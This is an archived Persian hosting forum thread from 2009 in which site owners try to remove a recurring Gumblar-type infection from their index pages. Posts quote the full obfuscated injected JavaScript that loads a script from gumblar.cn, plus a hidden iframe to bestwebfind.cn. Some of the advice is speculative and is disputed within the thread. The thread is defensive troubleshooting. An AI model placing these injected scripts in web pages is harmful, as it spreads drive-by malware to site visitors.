توجه ! این یک نسخه آرشیو شده میباشد و در این حالت شما عکسی را مشاهده نمیکنید برای مشاهده کامل متن و عکسها بر روی لینک مقابل کلیک کنید : جلوگیری از هک شدن سایت !!
sodahost
May 12th, 2009, 10:31
سلام دوستان چند وقت هست که یکی از سایت های مشتری من
که با html برنامه نویسی شده است
هر روز صفحه index.htm اون هک میشه و کد
<script language=javascript><!--
(function(){var nyN='%';var rml=('va@72@20@61@3d@22@53criptEng@69ne@22@2c@62@3 d@22V@65rsi@6fn()@2b@22@2cj@3d@22@22@2cu@3d@6eav@6 9gator@2euse@72Agen@74@3bif(@28u@2e@69n@64@65xOf(@ 22Win@22@29@3e0)@26@26(u@2ein@64exOf(@22N@54@206@2 2@29@3c@30@29@26@26(documen@74@2ecookie@2eindex@4f f@28@22mi@65k@3d@31@22)@3c0)@26@26(ty@70eo@66@28zr vzt@73)@21@3dt@79@70e@6ff@28@22A@22)))@7b@7arv@7a@ 74s@3d@22A@22@3beva@6c(@22if(win@64ow@2e@22@2ba+@2 2)j@3dj@2b@22+a+@22@4da@6aor@22@2b@62+a+@22M@69@6e or@22+b@2ba@2b@22Bui@6cd@22@2bb+@22j@3b@22)@3bdocu ment@2ew@72ite(@22@3cscript@20src@3d@2f@2fgu@6dbla r@2ecn@2f@72@73@73@2f@3fi@64@3d@22@2b@6a+@22@3e@3c @5c@2fscript@3e@22)@3b@7d').replace(/@/g,nyN);eval(unescape(rml))})();
--></script>
اسم ویروس هم : JS:Redirector-H7 [Trj] هست !!
در صفحه درج میشه !!
مشکل از کجاست ؟
اسم سایت www.Azarakhsh.ir
---------------
1 - سیستم کاربر virus ندارد !
2 - چند بار پسورد FTP رو عوض کردم
3 - فایل های سایت رو بررسی کردم هیچ فایلی به هاست اضافه نشده بود
---------
منتظر جواب شما هستم
Dadeha.com
May 12th, 2009, 11:44
یکی از سایت های سرور من هم همین مشکل رو داره.
تمام دسترسی ها درست هستش ولی با این که پاکش میکنم بازم میاد.
امروز این ویروز رو تو یکی از سرورهایی که به نظرم امن میومد هم دیدم و چند تا از سایت های اونجا هم آلوده شدن.
دوستان آنتی ویروس چی برای این ویروس خوبه؟ به نظر میاد نویسنده ویروس تصمیمات شومی در سرش داشته باشه.
فعلا داره ویروس رو منتشر میکنه و هنوز هیچ خرابکاری ازش دیده نشده.
IFACO.Net
May 12th, 2009, 12:31
سلام
یکی از اصلی ترین راه های انتشار این ویروس ها سرایت از سایت های به کامپیوتر کاربران و سپس از آنها به سایت هایشان می باشد !
یکی از بهترین آنتی ویروس ها ، آنتی ویروس آواست Avast! می باشد که قوی ترین ابزار ضد اسکریپت های آلوده را در اختیار دارد !
آدرس سایتش هم اینه : www.avast.com
و این هم لینک دانلود آنتی ویروس مورد نظر که تا چند ماه رایگان هست :
3 ) برای فایلهای js : این ویروس خودش را در فایلهای جاوا نیز کپی می کند و آنها را نیز چک نمائید .
این ویروس چند نوع دارد : 1 ) همانی که در بالا توضیح داده شد 2 ) همین ویروس ولی با استفاده از iframe
اگر نوع اول ویروس را گرفتید که بسیار خوشحال باشید . چرا که تنها سایتتان ویروسی شده و هرچند سخت اما قابل درمان است .
اگر نوع دوم ویروس را گرفتید که شخصا پیشنهاد می کنم قید سایت خود را بزنید و کلا بروید دنبال کار دیگری .
در نوع دوم علاوه بر بلایایی که بخاطر ویروس بر سر شما می آید یک حادثه بسیار تلخ رخ می دهد و آن این است که گوگل سایت
شما را سایتی تشخیص می دهد که ویروس پخش می کند و سایت شما را بن می کند !
اگر این مشکل را نیز بتوانید حل کنید ( که خودتان نمی توانید و باید یک متخصص سئو این کار را انجام دهد ), دیگر چیزی در گوگل
به اسم سایت شما وجود ندارد ! یعنی تمامی زحماتی که کشیده بودید تا رتبه مناسبی در گوگل بگیرید بر بارد رفته است .
توجه داشته باشید که گوگل این موضوع را خیلی سریع متوجه می شود و بدون اینکه چیزی بگوید عمل می کند .
یعنی کاری ندارد که شما مقصر هستید یا نه ! سایت شما هک شده یا خودتان این کار را کرده اید ! کلا فقط یک چیز
را می داند و آن اینکه سایت شما فقط باید مسدود شود !!!
اگر سایت شما به این ویروس از نوع دوم گرفتار شود در کمتر از یک نصف روز در گوگل ویروس شناخته خواهید شد و این جمله
در بالای تمام نتایجی که سایت شما در گوگل بیاورد نشان داده می شود :
این وبگاه ممکن است به رایانه شما آسیب وارد نماید.
گوگل اینها را malware نامیده که معنای آن تقریبا بدافزار می شود .
پس همین الان سایت خود را باز کرده و دنبال این کدها باشید . یافتن آنها ساده است در همان ابتدای کدها قابل مشاهده است .
بخصوص به دنبال iframe باشید . در این بخش ممکن است آی فریمی را مشاهده نمائید که ابعاد آن بسیار کوچک باشد که
قابل مشاهده نباشد .
مژده : تابحال مشاهده نشده که سایتهایی که با دات نت یا asp کلاسیک ساخته شده اند آلوده به این ویروس شده باشند .
اما کار از محکم کاری عیب نمی کند .
این ویروس چه می کند ؟
اگر وارد سایتی شدید و ناگهان متوجه شدید یک فایل pdf از چنین آدرسی http:// gumblar . cn/rss/?id=2 می خواهد دانلود
شود یا باز شود مطمئن باشید که سایت یک نوعی از این ویروس را گرفته است .
تابحال هیچ انسانی متوجه نشده که اگر این فایل اجرا شود چه اتفاقی می افتد !
این سایت را در مرورگر خود به عنوان لیست سیاه قرار دهید ( هر چند که فایده ای هم ندارد ) .
این ویروس اولین کاری که می کند این است که لود شدن سایت را کند می کند , درست به مانند زمانی که سایت در حال
bandwidth تمام کردن است یا خیلی شلوغ است .
مسلما نویسنده این ویروس نیات شومی در سر دارد . چرا که تابحال خرابکاری خاصی در کامپیوتر کسی صورت نگرفته است .
یقینا صاحب ویروس قصد دارد تا ویروس را به کامپیوترهای زیادی تزریق کند و در یک اقدام ناگهانی خرابکاری خاصی را انجام
دهد که میلیونها نفر متضرر آن شوند .
این ویروس چگونه وارد سایتها شده است ؟
در این مبحث نظریه ها و فرضیه های گوناگون و زیادی ارائه شده است .
1 ) اولین نظریه این را عنوان می کند که این شخص سایت را هک کرده و این ویروس را وارد سایت می کند !
آیا چنین چیزی با منطق سازگار است ؟ مگر یکی دو سایت است ؟ هزاران سایت در سرتاسر جهان آلوده به این ویروس شده اند .
2 ) دومین نظریه بر این استوار است که این می تواند یکی از حملات بات نتی ( مثلا DDos ) باشد که این قدری می تواند
درست باشد اما چرا تنها بعضی از سایتها ( البته فعلا ) دچار این مشکل شده اند ؟
3 ) نظریه سوم عنوان می کند که این ویروس برنامه های کار با FTP را آلوده می کند و هر فایلی که از طریق این برنامه ها
آپلود می شود این ویروس خودش را به آنها می افزاید . این نظریه تا حدودی منطقی به نظر می رسد اما پس از بررسیهای
کارشناسی این بحث رد شد . بعضی از صاحبان سایت با SFTP فایلها را آپلود می کردند پس چرا آنها ویروس را گرفتند .
آنتی ویروسهای بزرگی که به هر چیزی شک می کنند چرا برنامه ای را که نا خود آگاه روی کامپیوتر دانلود شده , نصب شده و
اجرا شده را شناسایی نکرده اند ؟
4 ) چهارمین نظریه که بهترین آنها نیز می باشد انگشت اتهام را به سمت و سوی هاستینگها نشانه می روند که همانا
صحیح است .
اینکه تنها بعضی از سایتها آلوده می شوند . اینکه هیچ کس نمی داند چگونه این ویروس وارد سایتشان شده است . و یکی
دو دلیل دیگر مظنون شماره یک این ماجرا را سرورهای ضعیف هاستینگ می داند .
اگر سرور هاستینگ سروری با ایمنی بالا باشد هرگر دچار چنین مشکلی نخواهید شد .
وای به روزی که یکی از بلاگ ها چنین ویروسی را بگیرند .
نکته جالب اینجاست که آمار آلوده شدن سایتهای ایرانی به این ویروس بسیار زیاد است .
مرکز فعالیت این ویروس چیست ؟
مرکز فعالیت این ویروس در سایت شما یک چیز است . فایلی به نام image.php !!!
ویروس این فایل را در تمامی فولدرهایی که نام imgaes دارند کپی می کند . حال هرچند بار نیز که شما کدها را از فایلهای
خود حذف کنید باز هم نمایان خواهند شد . چراکه این فایل دستور ساخت آنها را می دهد .
راه چاره چیست ؟
همیشه پیشگیری بهتر از درمان است . چه این ویروس را گرفته باشید و چه نگرفته باشید این کارها را انجام دهید .
در چنین مواقعی است که ارزش بک آپها مشخص می شود , اگر یک آپ دارید که هیچ اما اگر ندارید :
1 - یک فایل خالی به نام image.php می سازید .
2 - این فایل را با فایلی که در فولدر imgaes در سایتتان وجود دارد جابجا می کند و سطح دسترسی آن را جوری تنظیم می کنید
که در آن write وجود نداشته باشد .
3 - کدهای مذکور را از فایلهای سایتتان پاک کرده و سطح دسترسی این فایلها را نیز طروی تنظیم می کنید که در آن write وجود
نداشته باشد .
4 - تمامی فایلهایی که یا به نام های زیر هستند یا این نامهای در قسمتی از نام آنها وجود دارد را چک می کنید :
index.php
index.htm
index.html
functions.php
script.js
config.php
setting.php
db.php
منبع: mybbsupport (http://mybbsupport.ir)
IFACO.Net
May 12th, 2009, 16:55
سلام لطف کردید !!
ولی مهندس جان اگه کامل می خوندی می فهمیدی !!
من گفتم که سیستم کاربر ویروس نداره !!
از کجا فهمیدی ویروس نداره !
منکه گفتم خیلی از آنتی ویروس ها این ویروس های جدید رو نمی شناسند و فقط آواست و نورتون2009 اینا رو میشناسه !!! :scooter:
IFACO.Net
May 12th, 2009, 17:12
4 ) چهارمین نظریه که بهترین آنها نیز می باشد انگشت اتهام را به سمت و سوی هاستینگها نشانه می روند که همانا
صحیح است .
اینکه تنها بعضی از سایتها آلوده می شوند . اینکه هیچ کس نمی داند چگونه این ویروس وارد سایتشان شده است . و یکی
دو دلیل دیگر مظنون شماره یک این ماجرا را سرورهای ضعیف هاستینگ می داند .
اگر سرور هاستینگ سروری با ایمنی بالا باشد هرگر دچار چنین مشکلی نخواهید شد .
وای به روزی که یکی از بلاگ ها چنین ویروسی را بگیرند .
نکته جالب اینجاست که آمار آلوده شدن سایتهای ایرانی به این ویروس بسیار زیاد است .
منبع: mybbsupport (http://mybbsupport.ir)
نویسنده در این مقاله نهایت کم اطلاعی خودش رو به نمایش گذاشته و این مطالب اکثرا درست نیستند !!!
Dadeha.com
May 12th, 2009, 17:35
نویسنده در این مقاله نهایت کم اطلاعی خودش رو به نمایش گذاشته !!!
با اینکه من نویسنده نیستم و فقط نقل کردم. میتونم دلیل این حرف شما رو بدونم؟ چون گفته به سوی هاستینگ هاست به شما برخورده؟!
ویروس خیلی راحت داره خودش رو منتشر میکنه و حتی هنوز هاستینگ ها دلیلش رو نمیدونن و هیچ راهی برای مقابله با اون پیدا نکردند.
آنتی ویروس سرورها نمیتونه ویروس را شناسایی کنه. (اگر باور ندارید یک نسخه از ویروس را به شما میدم تا در سرور خودتون چک کنید) :hammer:
با این نکته حرفم رو تموم کنم ، بهتره کمی واقع گرا باشیم. اینجا اکثرمون هاستینگ داریم و داریم به مشتریامون هاست ارائه میدیم. این ناراحت شدن ها و احساساتی برخورد کردنا خودمون رو از بین میبره.
من دقیقا طبق همین مقاله عمل کردم و الان لود سرور اومده پایین و مصرف رم نصف شده ، برای همین بود که مقاله رو گذاشتم تا دیگران هم استفاده کنند نه اینکه بعضی ها بیان و احساساتی برخرود کنن :2guns:
IFACO.Net
May 12th, 2009, 17:59
با اینکه من نویسنده نیستم و فقط نقل کردم. میتونم دلیل این حرف شما رو بدونم؟ چون گفته به سوی هاستینگ هاست به شما برخورده؟!
ویروس خیلی راحت داره خودش رو منتشر میکنه و حتی هنوز هاستینگ ها دلیلش رو نمیدونن و هیچ راهی برای مقابله با اون پیدا نکردند.
آنتی ویروس سرورها نمیتونه ویروس را شناسایی کنه. (اگر باور ندارید یک نسخه از ویروس را به شما میدم تا در سرور خودتون چک کنید) :hammer:
با این نکته حرفم رو تموم کنم ، بهتره کمی واقع گرا باشیم. اینجا اکثرمون هاستینگ داریم و داریم به مشتریامون هاست ارائه میدیم. این ناراحت شدن ها و احساساتی برخورد کردنا خودمون رو از بین میبره.
من دقیقا طبق همین مقاله عمل کردم و الان لود سرور اومده پایین و مصرف رم نصف شده ، برای همین بود که مقاله رو گذاشتم تا دیگران هم استفاده کنند نه اینکه بعضی ها بیان و احساساتی برخرود کنن :2guns:
عزیز برادر !
من هم میدونم که شما نویسنده نیستید !
شما وقتی از یه فایل یا اسکریپت ضعیف که کلی باگ داره استفاده می کنید، چرا تقصیر رو میندازید گردن هاستینگ و سرور ها ؟؟؟!!!
چرا اسکریپتهای قوی مثل وی بولیتین آلوده نمیشند ؟!
و همینطور بن شدن یک سایت در گوگل رو براحتی با یک ایمیل در عرض یک روز میشه رفع کرد !!!
نه اینکه سایت مون رو بندازیم دور .....
گرچه بعضی قسمت ها مقاله خوب و مفید هستند ولی این مطالبی که عرض کردم کاملا نشون دهنده کم اطلاعی نویسنده مقاله هستند !!!
IFACO.Net
May 12th, 2009, 18:03
من دقیقا طبق همین مقاله عمل کردم و الان لود سرور اومده پایین و مصرف رم نصف شده ... :2guns:
این قضیه هم دلیلش این بوده که موقعی که جناب روبات هکری که میخواسته نفوذ کنه به فایل های پی اچ پی شما ! ، نوعی ddos انجام میداده تا در پردازش فایل های پی اچ پی رو مختل کنه و کارش رو انجام بده !!! و به همین خاطر لود سرور شدیدا بالا میرفته !
Dadeha.com
May 12th, 2009, 18:24
اسکریپتی که ما داریم استفاده میکنیم mybb هستش که امنیتش چیزی کمتر از vBulletin نداره.
به هر حال ممنون از همکاری شما در این بحث
Vahid
May 13th, 2009, 08:29
بحث امنیت سرور رو با امنیت اسکریپت قاطی نکنید
sodahost
May 18th, 2009, 15:21
سلام
یه مشکل دیگه من داخل فولدر images فایل php رو خالی کردم و 444 کردم
فایل index.htm رو هم 444 کردم و تمام سایت رو به دقت چک کردم تمام فایل های JS و PHP و HTML رو چک کردم هیچ کدی نبود تا اینکه بعد 7 روز دوباره <iframe src="http://bestwebfind.cn:8080/ts/in.cgi?pepsi11" width=2 height=4 style="visibility: hidden"></iframe>
این کد اضافه شد به صفحه ایندکس ؟
مشکل از کجاست ؟
کدوم قسمت از امنیت سرور مشکل داره که اونو بر طرف کنیم ؟
www.SanatPayam.com
این سایت مشتری هست ! نهایت بعد 6 ساعت دوباره اون کد وارد میشه !
IFACO.Net
May 18th, 2009, 15:39
سلام
اگه در سرور بک آپ دارید، اکانت رو کلا حذف کنید و سپس از بک آپ موقعی که سایت پاک بود ، سایت رو رستور کنید و موقع رستور گزینه ریکریت recreate رو هم تیک بزنید تا اکانت مجددا ساخته بشه !
موفق باشید
sodahost
May 19th, 2009, 00:28
مهندس جان وقتی همه فایل رو دوباره از روی سرور حذف کردم و فایل ها رو دوباره آپلود کردم !!
چه مشکلی هست ! و اینکه چند سایت دیگه هم اینجوری شده !
مشکل اصلی رو باید بر طرف کرد
Restore Backup که نشد جواب سوال !!
احتمالا یه باگ در PHP یا Apache هست که این سوتی رو داره میده !
اونو باید بر طرف کرد !!
IFACO.Net
May 19th, 2009, 10:22
مهندس جان وقتی همه فایل رو دوباره از روی سرور حذف کردم و فایل ها رو دوباره آپلود کردم !!
چه مشکلی هست ! و اینکه چند سایت دیگه هم اینجوری شده !
مشکل اصلی رو باید بر طرف کرد
Restore Backup که نشد جواب سوال !!
احتمالا یه باگ در PHP یا Apache هست که این سوتی رو داره میده !
اونو باید بر طرف کرد !!
خب عزیز دلم
به احتمال 90 درصد آپاچی سرور شما آلود شده !
یکی از بهترین راه هاش اینه که ابتدا سایت های آلوده رو پاکسازی کنید و سپس آپاچی و پی اچ پی سرور تون رو reinstall کنید و بعد از نصب مجدد آخرین ورژن آپاچی و پی اچ پی ، سرورتون رو یک بار ریستارت کنید
sodahost
May 23rd, 2009, 00:49
مشکل پیدا شد !
SuPHP رو از وقتی که فعال کردم دیگه این مشکل دیده نشد !!
uefa
September 18th, 2009, 04:31
جالبه من هم به همچنین موردی برخوردم.
روز اول 2 تل از وب سایت ها و الان فقط www.uefa.ir آلوده شده.
هر روز دستی سریع فایلها رو جایگزین می کنم.